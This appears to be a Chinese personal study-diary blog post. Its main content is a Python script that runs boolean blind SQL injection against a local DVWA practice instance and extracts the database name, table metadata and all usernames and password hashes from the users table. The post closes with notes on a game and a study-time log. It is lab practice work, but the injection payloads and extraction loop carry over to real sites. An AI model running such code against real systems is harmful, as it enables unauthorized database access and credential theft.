好吧,还是用简单的方法吧

昨天不是在做 用python去注入low等级的dvwa吗

今天做了好久,还是卡在获取字段名字那一块。需要用到的循环太多了。

暂时先用简单的取巧的方法做出了最后成果,时间太晚了,没时间把这个代码简化了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
import requests
from bs4 import BeautifulSoup

url = 'http://127.0.0.1/vulnerabilities/sqli_blind/?id='
headers = {
'Cookie': 'PHPSESSID=os37h075jj8cn88hepi1acau3a; security=low',
'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'
}
data = list('[email protected]_') #ascii表


print("开始破解数据库:")

#获取当前数据库的长度
dababase_len = "1' and length(database())=%s%%23&Submit=Submit#" #数据库名字的长度
dababase_len_real = "" #数据库名字的真实长度
for i in range(1,100):
url_real = url + dababase_len % str(i)
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text=rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text() #返回的是列表吗?
if len(value) == 31: #错误len=37 正确len=31
dababase_len_real = str(i)
print("数据库名字的长度:",dababase_len_real)
break
else:
pass
#破解当前数据库名字
dababase_name = "1' and ascii(substr(database(),%s,1))=%s%%23&Submit=Submit#" #数据库名的名字
dababase_name_real = "" #数据库的真实名字
for i in range(1,int(dababase_len_real)+1):
for i2 in data:
url_real = url + dababase_name % (str(i),ord(str(i2)))
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text = rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text() # 返回的是列表吗?
if len(value) == 31: # 错误len=37 正确len=31
dababase_name_real = dababase_name_real + str(i2)
break
else:
pass
print("数据库名字:", dababase_name_real)

#数据库里面表的数量
table_num = "1' and (select count(table_name) from information_schema.tables where table_schema=database())= %s%%23&Submit=Submit#" #表的数量
table_num_rel = "" #真实的表数量
for i in range(1,100):
url_real = url + table_num % str(i)
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text=rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text()
if len(value) == 31:
table_num_rel = str(i)
print("表的数量:",table_num_rel)
break
else:
pass

#各个表的长度
table_len = "1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),1))=%s%%23&Submit=Submit#"
table_len_rel = []
for i in range(0,int(table_num_rel)):
for i2 in range(1,100):
url_real = url + table_len % (str(i),i2)
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text=rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text()
if len(value) == 31:
table_len_rel.append(str(i2))
print('第',str(i+1),'个表的名字长度',str(i2))
break
else:
pass

# #各个表的名字
# table_name = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1))=%s%%23&Submit=Submit#"
# table_name_rel= []
# for i in range(0, len(table_len_rel)): # 0:第一个表 1:第二个表
# a=""
# for i2 in range(0,int(table_len_rel[i])+1): # 0-
# for i3 in data:
# url_real = url + table_name % (str(i), str(i2) ,ord(str(i3)))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# a = a + str(i3)
# print(a)
# break
# else:
# pass
# table_name_rel.append(a)
# print("数据库中的表:",table_name_rel)
#
# #每个表有几个字段
# col_num = "1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')=%s%%23&Submit=Submit#"
# col_num_rel = {}
# for i in range(0,len(table_name_rel)):
# for i2 in range(1,100):
# url_real = url + col_num % (str(table_name_rel[i]),str(i2))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# print("第",str(i+1),"表里有",str(i2),"个字段")
# col_num_rel.update({str(i+1):str(i2)})
# break
# else:
# pass #{'1': '3', '2': '8'}
# print(col_num_rel)
#
#
# # #选择user表,破解出字段名
# # col_name="1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %s,1),%s,1)) =%s%%23&Submit=Submit#"
# # col_name_rel=[]
# # for i in range(int(col_num_rel["2"])):
# # a=""
# # for i2 in range(15):
# # for i3 in data:
# # url_real = url + col_name % (str(i), str(i2), ord(str(i3)))
# # #print(url_real)
# # rep = requests.get(url_real, headers=headers)
# # rep_text = rep.text
# # soup = BeautifulSoup(rep.text, 'lxml')
# # tag = soup.find_all("pre")
# # value = tag[0].get_text()
# # if len(value) == 31:
# # a += str(i3)
# #
# # break
# # else:
# # pass
# # # print(a)
# # col_name_rel.append(a)
# # print(col_name_rel)
#
# #user表,user和passwd中额全部信息
# user_len ="1' and length(substr((select user from users limit %s,1),1))=%s%%23&Submit=Submit#"
# user_len_rel=[]
# for i in range(10):
# for i2 in range(20):
# url_real = url + user_len % (str(i),str(i2))
# # print(url_real)
# rep = requests.get(url_real, headers=headers)
# rep_text = rep.text
# soup = BeautifulSoup(rep.text, 'lxml')
# tag = soup.find_all("pre")
# value = tag[0].get_text()
# if len(value) == 31:
# print(i2)
# break
# else:
# pass


user_name ="1' and ascii(substr((select user from users limit %s,1),%s,1))=%s%%23&Submit=Submit#"
password_name ="1' and ascii(substr((select password from users limit %s,1),%s,1))=%s%%23&Submit=Submit#"
for i in range(0,10):
a=""
for i2 in range(1,10):
for i3 in data:
url_real = url + user_name % (str(i),str(i2),ord(str(i3)))
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text = rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text()
if len(value) == 31:
a+=str(i3)
break
else:
pass
print('用户名:',a)

b=""
for i2 in range(1,33):
for i3 in data:
url_real = url + password_name % (str(i),str(i2),ord(str(i3)))
# print(url_real)
rep = requests.get(url_real, headers=headers)
rep_text = rep.text
soup = BeautifulSoup(rep.text, 'lxml')
tag = soup.find_all("pre")
value = tag[0].get_text()
if len(value) == 31:
b+=str(i3)
break
else:
pass
print('密码:',b)

想起来一件事情

之前不是有一天玩那个人类:一败涂地吗。这个3D我居然也头晕。

昨天hexo上传 日记到github 失败了。今天还忘记处理了。明天搞。

现在欠的时间:10.5小时

越欠越多,明天星期五。手头上的事情不是很紧了,补补补

1
2
3
4
5
6
6月16号 7:30-10:00 am 2.5小时   英语阅读
6.00-10.00 pm 2小时 (html+php+python)+英语听力
6月17号 7:30-10:30 am 3个小时 英语阅读
6月18号 1小时英语阅读
6月19号 1个小时英语阅读(我全用来写pytohn了)
6月20号 1个小时英语阅读(我全用来写pytohn了)